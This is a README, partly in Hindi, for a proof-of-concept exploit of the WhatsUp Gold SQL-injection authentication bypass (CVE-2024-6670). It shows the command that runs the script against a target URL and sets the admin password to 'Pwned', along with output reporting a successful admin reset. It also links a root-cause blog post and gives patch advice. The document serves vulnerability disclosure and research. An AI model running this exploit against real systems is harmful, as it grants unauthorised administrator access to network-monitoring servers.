
Progress WhatsUp Gold के SQL इंजेक्शन प्रमाणीकरण बाईपास (CVE-2024-6670) के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण। इसमें मूल कारण विश्लेषण और प्रशासक पहुंच प्राप्त करने के लिए स्वचालित पासवर्ड रीसेट शामिल है।
Progress Software WhatsUp Gold HasErrors SQL Injection Authentication Bypass Vulnerability (CVE-2024-6670) के लिए PoC
इस कमजोरी का मूल कारण विश्लेषण मेरे ब्लॉग पर पाया जा सकता है:
https://summoning.team/blog/progress-whatsup-gold-sqli-cve-2024-6670/
python CVE-2024-6670.py --newpassword Pwned --target-url https://192.168.201.150
_______ _ _ _______ _______ _____ __ _ _____ __ _ ______ _______ _______ _______ _______
|______ | | | | | | | | | | | \ | | | \ | | ____ | |______ |_____| | | |
______| |_____| | | | | | | |_____| | \_| __|__ | \_| |_____| . | |______ | | | | |
(*) Progress Software WhatsUp Gold HasErrors SQL Injection Authentication Bypass Vulnerability (CVE-2024-6670)
(*) Exploit by Sina Kheirkhah (@SinSinology) of SummoningTeam (@SummoningTeam), shoutout to @indishell1046
(*) Technical details: https://summoning.team/blog/progress-whatsup-gold-sqli-cve-2024-6670/
[^_^] Starting the exploit...
[*] Used remote primitive to encrypt our passowrd
[*] encrypted password extracted -> 0x03000000100000000EABC7F4B1C8263DADB17E4BED835C0F
[+] Exploit finished, you can now login using the username -> admin and password -> Pwned
नवीनतम संस्करण में अपडेट करें या Progress Advisory के निर्देशों का पालन करके शमन करें
यदि यह मेरे प्रिय मित्र Manish की प्रेरणा और शिक्षाओं के लिए नहीं होता जो उन्होंने मुझे पिछले वर्षों में सिखाई हैं, तो मैं इस बग का शोषण नहीं कर पाता, धन्यवाद मेरे दोस्त।
यह सॉफ्टवेयर पूरी तरह से अकादमिक अनुसंधान और प्रभावी रक्षात्मक तकनीकों के विकास के उद्देश्यों के लिए बनाया गया है, और इसका उपयोग उन प्रणालियों पर हमला करने के लिए नहीं किया जाना चाहिए जहां स्पष्ट रूप से अधिकृत नहीं किया गया है। परियोजना अनुरक्षक सॉफ्टवेयर के दुरुपयोग के लिए जिम्मेदार या उत्तरदायी नहीं हैं। जिम्मेदारी से उपयोग करें।